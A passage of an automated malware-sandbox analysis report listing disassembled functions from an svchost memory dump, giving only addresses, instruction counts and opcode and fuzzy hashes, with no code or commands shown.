                                                                    Function 036AE609 Relevance: .1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a1488e139124588e49a482fe9cb6ab02ae82e63c10556d035c69d3b1d4d2118
                                                                    • Instruction ID: bb1f0d6ccf6016fff85e9d0a096afdc314d4fccf84c1a5a266b88627b94534b4
                                                                    • Opcode Fuzzy Hash: 5a1488e139124588e49a482fe9cb6ab02ae82e63c10556d035c69d3b1d4d2118
                                                                    • Instruction Fuzzy Hash: E1316D75A00605DFCB14CF1CC984DAEB7B5EF88304B15895AE8059B391E772EE61CF94
                                                                    Function 03633616 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 58dcaef159e4288099b50cfc97d7db574937aeb7fcef4f6eda0e4234b536d67e
                                                                    • Instruction ID: cfa31418923293abc369ac92ae038b7722c01b57bf94478eae1a415d150f794e
                                                                    • Opcode Fuzzy Hash: 58dcaef159e4288099b50cfc97d7db574937aeb7fcef4f6eda0e4234b536d67e
                                                                    • Instruction Fuzzy Hash: 2C21F2392457609FCB61EF04CA58B2ABBA4FF83B10F29486DE9410B751C7B0E854CB91
                                                                    Function 03700591 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d27681a8c565a9b783fe6ed71702170c09da9cb81127b10cb3d31315d9ddcb6
                                                                    • Instruction ID: 691291992e3dd7008a497aa4083e01a13afd145ab27b45a863d75e133f53679b
                                                                    • Opcode Fuzzy Hash: 2d27681a8c565a9b783fe6ed71702170c09da9cb81127b10cb3d31315d9ddcb6
                                                                    • Instruction Fuzzy Hash: C1218B32614205CFD728CE29D880BAAB7E6EFD4320F998478E915DB2C5DB74F855CB90
                                                                    Function 0365F32A Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                    • Instruction ID: db17d7b879803c4a79718cb7173ae3a8f87680c043f2676902b0746ffbdeed96
                                                                    • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                    • Instruction Fuzzy Hash: 99217972200700DFD719DF15C545B6ABBE9EF95365F15817DE90A8F3A0EBB0A801CAA8
                                                                    Function 036B06F1 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c26d4f4ec19aec5025eb50faf0da88b1cb84877905d3e1d85d469d109d1139a3
                                                                    • Instruction ID: ecba113edbea4c97ffabbc53a7484993dea8aa255be3e438755b1d7d06ca5260
                                                                    • Opcode Fuzzy Hash: c26d4f4ec19aec5025eb50faf0da88b1cb84877905d3e1d85d469d109d1139a3
                                                                    • Instruction Fuzzy Hash: 3E21AD75A00229ABCF20DF59C881ABEFBF8FF49740B540069E541AB240D778AD42CFA4
                                                                    Function 036B019F Relevance: .1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b4811e943bdf3fc03344e573d3725470c32d39519d85b88e566411c8c546045
                                                                    • Instruction ID: 8812e70f154a6ac0dde641ab8ecda89f1512202ac7c2d5cf03842ea5f8320859
                                                                    • Opcode Fuzzy Hash: 2b4811e943bdf3fc03344e573d3725470c32d39519d85b88e566411c8c546045
                                                                    • Instruction Fuzzy Hash: 4921AE75A00644AFC715DBA8C940FAABBB8FF48740F140069F944DB7A1D734ED50CBA8
                                                                    Function 03669660 Relevance: .1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1f71265f7cde3c099c0f100f119c9e662f656e8535d0d4040279d83c450222d3
                                                                    • Instruction ID: 7c8507317813c41c3db950788b07291fdcea242b68be1ae0ee61f933e6fead70
                                                                    • Opcode Fuzzy Hash: 1f71265f7cde3c099c0f100f119c9e662f656e8535d0d4040279d83c450222d3
                                                                    • Instruction Fuzzy Hash: 6921F330100B01DBEF31EB24CA10B2677E6EB41364F18465AED92CA7A0D731AC62DF55
                                                                    Function 036B0283 Relevance: .1, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2c6c8be19fbff6f0f592a74bc9b25541a1cdc93e28366fc7ea87ecc3c48f6b9
                                                                    • Instruction ID: 6aa627503e46fa8fe4d7221dec95c0d75cb66edc1ef9eb722e4fa7233f9b145f
                                                                    • Opcode Fuzzy Hash: b2c6c8be19fbff6f0f592a74bc9b25541a1cdc93e28366fc7ea87ecc3c48f6b9
                                                                    • Instruction Fuzzy Hash: AD21B6769043469BC711EF59C948B9BFBECBF81240F08445ABD80CB351D734D989CBA5
                                                                    Function 037001AA Relevance: .1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db6dc73fa20726821c8ef2134f69c9d3cc6227f3587657448270833cb3061308
                                                                    • Instruction ID: ac33395f31e7ffe21da3d40b559f3aa9079ca44f8bd5e27777a296092684a14d
                                                                    • Opcode Fuzzy Hash: db6dc73fa20726821c8ef2134f69c9d3cc6227f3587657448270833cb3061308
                                                                    • Instruction Fuzzy Hash: F521E4612142504FD745CB1AA8B54B7BFE5EFC6125B09C2E6D884CB346C134D907C7B0
                                                                    Function 0366A30B Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3db66cb10b7f14f713f78c98ff9e49f00b70e694fb2ab8972d13b84e85708b5f
                                                                    • Instruction ID: 989ad3127142e0e101528bd26d9428647bbc4d35c061c358d762a309f3bbd5e9
                                                                    • Opcode Fuzzy Hash: 3db66cb10b7f14f713f78c98ff9e49f00b70e694fb2ab8972d13b84e85708b5f
                                                                    • Instruction Fuzzy Hash: 55217C79600B109FC725DF69CD01B56B7F5AF48744F2884ACA91ADB761E331E842CF98
                                                                    Function 0362B765 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 001001e56ffeab1d921d1d8efe76b1c270c0ea4a88fd635c5631c0dc3820c9ee
                                                                    • Instruction ID: 2f4c86d54758bef1c46dc066bd8b98ca4cdb6b143e332597790a0b65e63621f1
                                                                    • Opcode Fuzzy Hash: 001001e56ffeab1d921d1d8efe76b1c270c0ea4a88fd635c5631c0dc3820c9ee
                                                                    • Instruction Fuzzy Hash: B1215776510B10DFC721EF68CA40B19BBB5FF18708F19896DE00A9BAA1C738A810CB48
                                                                    Function 036FEE26 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c3829acc8dd8b3676ba214999cdeb071b47e9b114fde86ecc43f2e064d4c290b
                                                                    • Instruction ID: a223ce5161597b3e1ec59c0a2b883564d7f98e1536d1d0f8a7b627b7c9fcebc8
                                                                    • Opcode Fuzzy Hash: c3829acc8dd8b3676ba214999cdeb071b47e9b114fde86ecc43f2e064d4c290b
                                                                    • Instruction Fuzzy Hash: AB21B433A104119F9B18CF3DD804466F7E6EFDD31436A827AD512EB269D774BD118A84
                                                                    Function 03660124 Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                    • Instruction ID: ccbe6fd37882f8294f07a3dbc90c3d22420ddf116d670c5fac300895bb27ef69
                                                                    • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                    • Instruction Fuzzy Hash: 1A11EF76600704BFD722DF84CC40FAABBB8EB80794F140039EA008F280D675ED44CB64
                                                                    Function 03638770 Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: efde14bc4fe99377bd980469690b7a851cdeb11ddc8672bb2ad8f189927d8fb8
                                                                    • Instruction ID: 6cecf36673a7f96792fc307693a341d8138d25ee980d569e07167f348217fd91
                                                                    • Opcode Fuzzy Hash: efde14bc4fe99377bd980469690b7a851cdeb11ddc8672bb2ad8f189927d8fb8
                                                                    • Instruction Fuzzy Hash: F611BF75701620DBCB11CF59C684AAAB7FAEF4B750B18806DFD08DF305D6B2E9068790
                                                                    Function 03633720 Relevance: .1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 387d17f4c7eb774c0096d01f92790b3409a79e69b5eab979495194718c61872f
                                                                    • Instruction ID: ae06daeba659944d05ae379434195ab82174bac3f1294cc5a6af0ac197641fcb
                                                                    • Opcode Fuzzy Hash: 387d17f4c7eb774c0096d01f92790b3409a79e69b5eab979495194718c61872f
                                                                    • Instruction Fuzzy Hash: 1B21C578A002098BE725DF6DD1487EDB7B4EB8A318F2D802CD812573D0CBB89945CB59
                                                                    Function 036380E9 Relevance: .1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8fdb770a6444826a418c1e2e3cdf961e2ba64d968b97cf2febae6fdc31b4fed
                                                                    • Instruction ID: e1d860e05db586eca38e364d5d06ad31f77435a620e2c5024f8cd45ed2d75fec
                                                                    • Opcode Fuzzy Hash: a8fdb770a6444826a418c1e2e3cdf961e2ba64d968b97cf2febae6fdc31b4fed
                                                                    • Instruction Fuzzy Hash: BC216D75A00206DFCB14CF98C681AAEBBB5FB89318F24416DE105AB310CB71AD0ACBD0
                                                                    Function 0366674D Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 730944cbdf0b446fc85ba6c0f690e15de8c4d08cba9d6a019ce8463eefc694cf
                                                                    • Instruction ID: 6359178d84a8cb1e3d12b440669b8404d9a508b867f860ea5b129a47c91596bd
                                                                    • Opcode Fuzzy Hash: 730944cbdf0b446fc85ba6c0f690e15de8c4d08cba9d6a019ce8463eefc694cf
                                                                    • Instruction Fuzzy Hash: 35218975600B00EFC720DF69D881B66B7E8FF84290F44882DE4AAC7250DA70EC50CBA4
                                                                    Function 03629240 Relevance: .1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74d5e26b06938c8465994b5ddc171734341058e8d770ca7bb2abca1ca3ac58bf
                                                                    • Instruction ID: 5c123ea6e1197e3a57b8738e3ae147fcff2df3f4bd852b8322accb0dd5c5cfe7
                                                                    • Opcode Fuzzy Hash: 74d5e26b06938c8465994b5ddc171734341058e8d770ca7bb2abca1ca3ac58bf
                                                                    • Instruction Fuzzy Hash: 0D11D33E020640ABE734EF65D941B617BA9EBA8780F14812AD8009B354D63CDD01CF69
                                                                    Function 036666B0 Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f0c12304c899a8784abc71b8c4fc5c2dfa898e0202d459979c8d8ac680b2867
                                                                    • Instruction ID: 1ebae63b6604137fc9e9be5e0bbd1b539f16501ba79f334e40fc5b2de9eb9117
                                                                    • Opcode Fuzzy Hash: 2f0c12304c899a8784abc71b8c4fc5c2dfa898e0202d459979c8d8ac680b2867
                                                                    • Instruction Fuzzy Hash: 6B11CE76A01244EFCB24DF59E684A5ABFE8EF94690F19807EE8059B310D674DD00CBA4
                                                                    Function 036FFF09 Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14ee82c43bbb2712d7fb3ea71fa0787250634a69ba520bb0164bc7ca2bff3c7d
                                                                    • Instruction ID: 3bce0ad1e3279f2673e37aeed7081558088a34cefa272552ba1657d54b9d82bf
                                                                    • Opcode Fuzzy Hash: 14ee82c43bbb2712d7fb3ea71fa0787250634a69ba520bb0164bc7ca2bff3c7d
                                                                    • Instruction Fuzzy Hash: 6D2152B1A102059FD754DF2AE884A42BBE5FB5D210B85C5BAE90CDF24AE770D844CB94
                                                                    Function 036527ED Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d7234c0e36138c5ee95c7c094e2d0638558b8b7f7ef95b4fbebbe3739b6007be
                                                                    • Instruction ID: d5757356a5bffc658716f28ebdd33fbff3f2c89d6d47965b3d082659d010ce26
                                                                    • Opcode Fuzzy Hash: d7234c0e36138c5ee95c7c094e2d0638558b8b7f7ef95b4fbebbe3739b6007be
                                                                    • Instruction Fuzzy Hash: 9B010476605644ABE716E2AADD54F67AADCEF41394F19047AF8008B240DA24DC05C2B1
                                                                    Function 0365B052 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1320547319e34a74ca98e5c9bae704e1e5925d84f5392940f26083fd1c94be86
                                                                    • Instruction ID: 3df2c6eb176f822cfc44408b93fd60353daf0f9de6807bb961c7602bcfb98ff2
                                                                    • Opcode Fuzzy Hash: 1320547319e34a74ca98e5c9bae704e1e5925d84f5392940f26083fd1c94be86
                                                                    • Instruction Fuzzy Hash: 79019676B04740ABD711EBA99C81F6BBAE8DF84614F04043DFA05D7241EA70E9018665
                                                                    Function 036ED6F0 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                    • Instruction ID: 79730bb3456e0b63c49aedf218cc671b6a27d2db7463610b0229f11b71cee44d
                                                                    • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                    • Instruction Fuzzy Hash: CD01A179711209AF9F04DBA6CA48CAFBBBDEFC4A44F050019E911C7200EB30EE05DB60
                                                                    Function 03634690 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d6bc4fe3040ddf5595f033d28f134af522d8ea745ce5c9551dff71cd613fb5b
                                                                    • Instruction ID: f349c5f411681c820eee149e203a8abd6fc1813017d2745a4f4821d597e535a6
                                                                    • Opcode Fuzzy Hash: 9d6bc4fe3040ddf5595f033d28f134af522d8ea745ce5c9551dff71cd613fb5b
                                                                    • Instruction Fuzzy Hash: 1A11A03A240744AFCB26CF5ADA48B56F7B8EB87764F04411AF9148B390CB71E800CF60
                                                                    Function 03666620 Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e58331a4d015ed5d7a82063b2935f32fb76dad2d2483762225466be67bf97d3a
                                                                    • Instruction ID: 62a7f2e604b14d8e9628bada4d57fb823135de54d8668689e1f0564d3dc81d94
                                                                    • Opcode Fuzzy Hash: e58331a4d015ed5d7a82063b2935f32fb76dad2d2483762225466be67bf97d3a
                                                                    • Instruction Fuzzy Hash: DD11E576A00715ABDB21EF59EA80B5EF7B8EF45790F540059D901EB300D730AD118BA5
                                                                    Function 03627330 Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65dc16eb65316bc33c18d7ac784f712d26694a26981c94ec320b4ab3fb13d482
                                                                    • Instruction ID: b9dfe25ed5645a178e4454f402c949c7dee7481f14243209b60901f191ec4c23
                                                                    • Opcode Fuzzy Hash: 65dc16eb65316bc33c18d7ac784f712d26694a26981c94ec320b4ab3fb13d482
                                                                    • Instruction Fuzzy Hash: 83119E71600B249FD721CF69C941F6B7BE8EB44304F064429E985CB352D735EC018FA5
                                                                    Function 0365F2D0 Relevance: .1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 792cbea7a19a7883f77bcaf3e732204a7a35263733305251adaed6bd6a338599
                                                                    • Instruction ID: d55aea130ea29483b70aeda9da93d70c8542ff0721de9e09cdd2196050b803d9
                                                                    • Opcode Fuzzy Hash: 792cbea7a19a7883f77bcaf3e732204a7a35263733305251adaed6bd6a338599
                                                                    • Instruction Fuzzy Hash: 7711CE75A00B48DBD720DF69C984BAEB7A8FF45700F1804BAE901EB341DA79DD01CB94
                                                                    Function 036C72A0 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                    • Instruction ID: c47b38a11b4b2ced49e2f22c6b446dd716dcf662f502622a2781bfc266990c62
                                                                    • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                    • Instruction Fuzzy Hash: A401D27A240649BFD711EF26CD90E62F77DFF44795B544929F10046660C721ACA0CAA8
                                                                    Function 0362A250 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                    • Instruction ID: d2a69944046b4c13da99ae5e2757955db829190e673c313676727ad58ca38b17
                                                                    • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                    • Instruction Fuzzy Hash: 5E01D671506B219BCB30CF95D940A36BFA9EF4576070A8A6DFC958B680DB31D821CF68
                                                                    Function 03636259 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0d1dfef05b5e5671058fd236a2123eaa2796aef3a660cce4f89e7479de47974a
                                                                    • Instruction ID: 3ba358f9c6cbcc446a2efba3180ffbbe174ef7bf72d7a811d78cc2bf68621afa
                                                                    • Opcode Fuzzy Hash: 0d1dfef05b5e5671058fd236a2123eaa2796aef3a660cce4f89e7479de47974a
                                                                    • Instruction Fuzzy Hash: 13117074541318ABDB25EB64CD51FE9B378EF04714F5045D9A314AA1E0DB709E91CF88
                                                                    Function 0363208A Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                    • Instruction ID: ab40db373c732af89c4fb54f4e3d40a8321ec40f316175d99be1678828b75fbb
                                                                    • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                    • Instruction Fuzzy Hash: 640124366002108BDF10EA29D990BE6B76ABFCA700F1949A9ED018F345EB71D881C7A0
                                                                    Function 0362C020 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
